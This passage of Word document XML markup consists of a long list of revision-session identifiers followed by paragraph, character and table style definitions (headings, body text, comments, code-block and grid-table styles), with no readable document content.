    <w:rsid w:val="00D731FC"/>
    <w:rsid w:val="00D73D3B"/>
    <w:rsid w:val="00D75960"/>
    <w:rsid w:val="00D76765"/>
    <w:rsid w:val="00D76CEB"/>
    <w:rsid w:val="00D779C5"/>
    <w:rsid w:val="00D77E6A"/>
    <w:rsid w:val="00D81842"/>
    <w:rsid w:val="00D86B6B"/>
    <w:rsid w:val="00D909EE"/>
    <w:rsid w:val="00D92C73"/>
    <w:rsid w:val="00D96CC4"/>
    <w:rsid w:val="00DA25D9"/>
    <w:rsid w:val="00DA4780"/>
    <w:rsid w:val="00DA4854"/>
    <w:rsid w:val="00DA5A34"/>
    <w:rsid w:val="00DB4194"/>
    <w:rsid w:val="00DB461A"/>
    <w:rsid w:val="00DB6C12"/>
    <w:rsid w:val="00DB7380"/>
    <w:rsid w:val="00DB762E"/>
    <w:rsid w:val="00DC014B"/>
    <w:rsid w:val="00DC049B"/>
    <w:rsid w:val="00DC089B"/>
    <w:rsid w:val="00DC12DF"/>
    <w:rsid w:val="00DC3DA4"/>
    <w:rsid w:val="00DC710F"/>
    <w:rsid w:val="00DD1DDA"/>
    <w:rsid w:val="00DD42B9"/>
    <w:rsid w:val="00DD783A"/>
    <w:rsid w:val="00DE0CF5"/>
    <w:rsid w:val="00DE0F55"/>
    <w:rsid w:val="00DE4D8C"/>
    <w:rsid w:val="00DE5310"/>
    <w:rsid w:val="00DE607F"/>
    <w:rsid w:val="00DE635A"/>
    <w:rsid w:val="00DF03C2"/>
    <w:rsid w:val="00DF0B13"/>
    <w:rsid w:val="00DF396C"/>
    <w:rsid w:val="00DF3E8F"/>
    <w:rsid w:val="00DF4CAD"/>
    <w:rsid w:val="00DF671E"/>
    <w:rsid w:val="00DF6D52"/>
    <w:rsid w:val="00DF72CB"/>
    <w:rsid w:val="00DF771A"/>
    <w:rsid w:val="00E00587"/>
    <w:rsid w:val="00E00F83"/>
    <w:rsid w:val="00E01103"/>
    <w:rsid w:val="00E01CD7"/>
    <w:rsid w:val="00E03B51"/>
    <w:rsid w:val="00E04F40"/>
    <w:rsid w:val="00E056E9"/>
    <w:rsid w:val="00E058F9"/>
    <w:rsid w:val="00E05BFE"/>
    <w:rsid w:val="00E07DAF"/>
    <w:rsid w:val="00E119A7"/>
    <w:rsid w:val="00E1270D"/>
    <w:rsid w:val="00E16350"/>
    <w:rsid w:val="00E16912"/>
    <w:rsid w:val="00E17D71"/>
    <w:rsid w:val="00E2027E"/>
    <w:rsid w:val="00E209C0"/>
    <w:rsid w:val="00E21B69"/>
    <w:rsid w:val="00E234CD"/>
    <w:rsid w:val="00E23FA4"/>
    <w:rsid w:val="00E276FC"/>
    <w:rsid w:val="00E3132E"/>
    <w:rsid w:val="00E32F0C"/>
    <w:rsid w:val="00E33262"/>
    <w:rsid w:val="00E36EC1"/>
    <w:rsid w:val="00E407C3"/>
    <w:rsid w:val="00E412F0"/>
    <w:rsid w:val="00E4333E"/>
    <w:rsid w:val="00E43E61"/>
    <w:rsid w:val="00E44390"/>
    <w:rsid w:val="00E456F5"/>
    <w:rsid w:val="00E45DDF"/>
    <w:rsid w:val="00E471A2"/>
    <w:rsid w:val="00E47A28"/>
    <w:rsid w:val="00E47A8D"/>
    <w:rsid w:val="00E5403D"/>
    <w:rsid w:val="00E540D5"/>
    <w:rsid w:val="00E54665"/>
    <w:rsid w:val="00E56380"/>
    <w:rsid w:val="00E574DD"/>
    <w:rsid w:val="00E60B56"/>
    <w:rsid w:val="00E61370"/>
    <w:rsid w:val="00E62951"/>
    <w:rsid w:val="00E62F15"/>
    <w:rsid w:val="00E65F51"/>
    <w:rsid w:val="00E66D88"/>
    <w:rsid w:val="00E70DDC"/>
    <w:rsid w:val="00E711F0"/>
    <w:rsid w:val="00E718C3"/>
    <w:rsid w:val="00E72A40"/>
    <w:rsid w:val="00E72FA1"/>
    <w:rsid w:val="00E742D6"/>
    <w:rsid w:val="00E77B51"/>
    <w:rsid w:val="00E80DF3"/>
    <w:rsid w:val="00E81712"/>
    <w:rsid w:val="00E81BA2"/>
    <w:rsid w:val="00E82A29"/>
    <w:rsid w:val="00E82D9F"/>
    <w:rsid w:val="00E83291"/>
    <w:rsid w:val="00E86135"/>
    <w:rsid w:val="00E86728"/>
    <w:rsid w:val="00E8759F"/>
    <w:rsid w:val="00E908ED"/>
    <w:rsid w:val="00E90BDE"/>
    <w:rsid w:val="00E91297"/>
    <w:rsid w:val="00E9206B"/>
    <w:rsid w:val="00E927F7"/>
    <w:rsid w:val="00E934D6"/>
    <w:rsid w:val="00E9363D"/>
    <w:rsid w:val="00E95123"/>
    <w:rsid w:val="00E95561"/>
    <w:rsid w:val="00E97C46"/>
    <w:rsid w:val="00EA0D04"/>
    <w:rsid w:val="00EA1809"/>
    <w:rsid w:val="00EA3122"/>
    <w:rsid w:val="00EA3218"/>
    <w:rsid w:val="00EA3544"/>
    <w:rsid w:val="00EA3793"/>
    <w:rsid w:val="00EA5B91"/>
    <w:rsid w:val="00EA63EC"/>
    <w:rsid w:val="00EA65D9"/>
    <w:rsid w:val="00EB00E5"/>
    <w:rsid w:val="00EB3E10"/>
    <w:rsid w:val="00EB45DA"/>
    <w:rsid w:val="00EC007B"/>
    <w:rsid w:val="00EC189B"/>
    <w:rsid w:val="00EC1A33"/>
    <w:rsid w:val="00EC2155"/>
    <w:rsid w:val="00EC239A"/>
    <w:rsid w:val="00EC2A1A"/>
    <w:rsid w:val="00EC6B08"/>
    <w:rsid w:val="00ED091F"/>
    <w:rsid w:val="00ED21A3"/>
    <w:rsid w:val="00ED2DC6"/>
    <w:rsid w:val="00ED3409"/>
    <w:rsid w:val="00ED664D"/>
    <w:rsid w:val="00ED771D"/>
    <w:rsid w:val="00EE0303"/>
    <w:rsid w:val="00EE0D15"/>
    <w:rsid w:val="00EE3380"/>
    <w:rsid w:val="00EE4D07"/>
    <w:rsid w:val="00EF067D"/>
    <w:rsid w:val="00EF17D3"/>
    <w:rsid w:val="00EF3133"/>
    <w:rsid w:val="00EF3B93"/>
    <w:rsid w:val="00EF3BF3"/>
    <w:rsid w:val="00EF4115"/>
    <w:rsid w:val="00EF5DDB"/>
    <w:rsid w:val="00EF684E"/>
    <w:rsid w:val="00EF74EA"/>
    <w:rsid w:val="00F01420"/>
    <w:rsid w:val="00F02371"/>
    <w:rsid w:val="00F04AF7"/>
    <w:rsid w:val="00F05010"/>
    <w:rsid w:val="00F0547C"/>
    <w:rsid w:val="00F05B50"/>
    <w:rsid w:val="00F061F1"/>
    <w:rsid w:val="00F117F8"/>
    <w:rsid w:val="00F11B1E"/>
    <w:rsid w:val="00F1212D"/>
    <w:rsid w:val="00F12197"/>
    <w:rsid w:val="00F1523F"/>
    <w:rsid w:val="00F175F6"/>
    <w:rsid w:val="00F21880"/>
    <w:rsid w:val="00F21E8D"/>
    <w:rsid w:val="00F2295D"/>
    <w:rsid w:val="00F2568C"/>
    <w:rsid w:val="00F27FB3"/>
    <w:rsid w:val="00F30277"/>
    <w:rsid w:val="00F30B5D"/>
    <w:rsid w:val="00F31090"/>
    <w:rsid w:val="00F3212F"/>
    <w:rsid w:val="00F349B3"/>
    <w:rsid w:val="00F35938"/>
    <w:rsid w:val="00F37F39"/>
    <w:rsid w:val="00F41125"/>
    <w:rsid w:val="00F41D4F"/>
    <w:rsid w:val="00F41FA7"/>
    <w:rsid w:val="00F43C9E"/>
    <w:rsid w:val="00F44A67"/>
    <w:rsid w:val="00F44D24"/>
    <w:rsid w:val="00F45C5D"/>
    <w:rsid w:val="00F461D5"/>
    <w:rsid w:val="00F51B73"/>
    <w:rsid w:val="00F53430"/>
    <w:rsid w:val="00F5380B"/>
    <w:rsid w:val="00F54DF6"/>
    <w:rsid w:val="00F56754"/>
    <w:rsid w:val="00F61759"/>
    <w:rsid w:val="00F6281C"/>
    <w:rsid w:val="00F62E4B"/>
    <w:rsid w:val="00F655BC"/>
    <w:rsid w:val="00F71301"/>
    <w:rsid w:val="00F71413"/>
    <w:rsid w:val="00F73D25"/>
    <w:rsid w:val="00F7484B"/>
    <w:rsid w:val="00F76885"/>
    <w:rsid w:val="00F82D16"/>
    <w:rsid w:val="00F83370"/>
    <w:rsid w:val="00F83EE0"/>
    <w:rsid w:val="00F84B3B"/>
    <w:rsid w:val="00F84F5D"/>
    <w:rsid w:val="00F8610B"/>
    <w:rsid w:val="00F90327"/>
    <w:rsid w:val="00F903DD"/>
    <w:rsid w:val="00F90557"/>
    <w:rsid w:val="00F950DE"/>
    <w:rsid w:val="00F95BD5"/>
    <w:rsid w:val="00F97996"/>
    <w:rsid w:val="00FA3793"/>
    <w:rsid w:val="00FA3C0C"/>
    <w:rsid w:val="00FA4135"/>
    <w:rsid w:val="00FA429B"/>
    <w:rsid w:val="00FA7352"/>
    <w:rsid w:val="00FA7535"/>
    <w:rsid w:val="00FA765B"/>
    <w:rsid w:val="00FB0EB2"/>
    <w:rsid w:val="00FB1E4D"/>
    <w:rsid w:val="00FB3F6F"/>
    <w:rsid w:val="00FB430E"/>
    <w:rsid w:val="00FB4800"/>
    <w:rsid w:val="00FB781C"/>
    <w:rsid w:val="00FB7CE0"/>
    <w:rsid w:val="00FC1296"/>
    <w:rsid w:val="00FC2BF6"/>
    <w:rsid w:val="00FC33B5"/>
    <w:rsid w:val="00FD03EF"/>
    <w:rsid w:val="00FD0900"/>
    <w:rsid w:val="00FD09A5"/>
    <w:rsid w:val="00FD0B6B"/>
    <w:rsid w:val="00FD166F"/>
    <w:rsid w:val="00FD19CB"/>
    <w:rsid w:val="00FD2EA9"/>
    <w:rsid w:val="00FD3026"/>
    <w:rsid w:val="00FD363C"/>
    <w:rsid w:val="00FD4861"/>
    <w:rsid w:val="00FE14E8"/>
    <w:rsid w:val="00FE245D"/>
    <w:rsid w:val="00FE2A70"/>
    <w:rsid w:val="00FE3ED2"/>
    <w:rsid w:val="00FE4F4A"/>
    <w:rsid w:val="00FE5E27"/>
    <w:rsid w:val="00FE64FF"/>
    <w:rsid w:val="00FE712D"/>
    <w:rsid w:val="00FE719D"/>
    <w:rsid w:val="00FF02D5"/>
    <w:rsid w:val="00FF0899"/>
    <w:rsid w:val="00FF14AC"/>
    <w:rsid w:val="00FF25AC"/>
    <w:rsid w:val="00FF3F9F"/>
    <w:rsid w:val="00FF4A8E"/>
    <w:rsid w:val="00FF6E77"/>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3AF2690"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EAEE1035-1968-4012-A5D3-4614377EC9FF}"/>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280E"/>
    <w:pPr>
      <w:spacing w:before="6pt" w:after="6pt"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:lang w:val="en-GB" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="006A0973"/>
    <w:pPr>
      <w:keepNext/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="C00000"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00575324"/>
    <w:pPr>
      <w:keepNext/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:ind w:start="18pt"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>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Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="216pt"/>
        <w:tab w:val="end" w:pos="432pt"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="216pt"/>
        <w:tab w:val="end" w:pos="432pt"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:ind w:start="18pt"/>
    </w:pPr>
    <w:rPr>
      <w:iCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="5pt" w:beforeAutospacing="1" w:after="5pt" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:rsid w:val="003961F5"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent2">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00A00BD6"/>
    <w:pPr>
      <w:spacing w:line="24pt" w:lineRule="auto"/>
      <w:ind w:start="14.15pt"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="00EA0D0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rsid w:val="00BC7E75"/>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pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="SimSun" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PlainText">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00655080"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="SimSun" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-headline">
    <w:name w:val="mw-headline"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00281A3A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="editsection">
    <w:name w:val="editsection"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00281A3A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:link w:val="Heading6"/>
    <w:rsid w:val="00346F13"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F2295D"/>
    <w:rPr>
      <w:lang w:val="en-GB" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ColorfulList-Accent11">
    <w:name w:val="Colorful List - Accent 11"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0044584F"/>
    <w:pPr>
      <w:ind w:start="36pt"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:link w:val="Heading3"/>
    <w:rsid w:val="006E087F"/>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="DocumentMap">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="DocumentMapChar"/>
    <w:rsid w:val="009A55A7"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DocumentMapChar">
    <w:name w:val="Document Map Char"/>
    <w:link w:val="DocumentMap"/>
    <w:rsid w:val="009A55A7"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003B2BA7"/>
    <w:pPr>
      <w:ind w:start="36pt"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention1">
    <w:name w:val="Unresolved Mention1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="47"/>
    <w:rsid w:val="00473728"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E83291"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:rsid w:val="00E83291"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:rsid w:val="00E83291"/>
    <w:rPr>
      <w:lang w:val="en-GB" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:rsid w:val="00E83291"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:rsid w:val="00E83291"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:lang w:val="en-GB" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable4-Accent2">
    <w:name w:val="Grid Table 4 Accent 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="47"/>
    <w:rsid w:val="009803D5"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="F4B083" w:themeColor="accent2" w:themeTint="99"/>
        <w:start w:val="single" w:sz="4" w:space="0" w:color="F4B083" w:themeColor="accent2" w:themeTint="99"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F4B083" w:themeColor="accent2" w:themeTint="99"/>
        <w:end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start w:val="single" w:sz="4" w:space="0" w:color="ED7D31" w:themeColor="accent2"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="ED7D31" w:themeColor="accent2"/>
          <w:end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7"/>
    <w:rsid w:val="00892A78"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
        <w:start w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
        <w:end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start w:val="single" w:sz="4" w:space="0" w:color="4472C4" w:themeColor="accent1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="4472C4" w:themeColor="accent1"/>
          <w:end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sc0">
    <w:name w:val="sc0"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00441936"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="HTMLPreformatted"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="000011E1"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="SimSun" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000011E1"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CodeBlock">
    <w:name w:val="Code Block"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeBlockChar"/>
    <w:qFormat/>
    <w:rsid w:val="000011E1"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>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pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
      <w:color w:val="24292E"/>
      <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
      <w:lang w:eastAsia="en-SG"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeBlockChar">
    <w:name w:val="Code Block Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CodeBlock"/>
    <w:rsid w:val="000011E1"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
      <w:color w:val="24292E"/>
      <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable6Colorful-Accent1">
    <w:name w:val="Grid Table 6 Colorful Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00485612"/>
    <w:rPr>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
        <w:start w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
        <w:end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1"/>
    <w:rsid w:val="00485612"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="666666" w:themeColor="text1" w:themeTint="99"/>
        <w:start w:val="single" w:sz="4" w:space="0" w:color="666666" w:themeColor="text1" w:themeTint="99"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="666666" w:themeColor="text1" w:themeTint="99"/>
        <w:end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start w:val="single" w:sz="4" w:space="0" w:color="000000" w:themeColor="text1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000" w:themeColor="text1"/>
          <w:end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qFormat/>
    <w:rsid w:val="0072522F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00D36AA1"/>
    <w:rPr>
      <w:lang w:val="en-GB" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:qFormat/>
    <w:rsid w:val="0026280E"/>
    <w:pPr>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:rsid w:val="0026280E"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria" w:cstheme="majorBidi"/>
      <w:b/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
      <w:u w:val="single"/>
      <w:lang w:val="en-GB" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0080726D"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
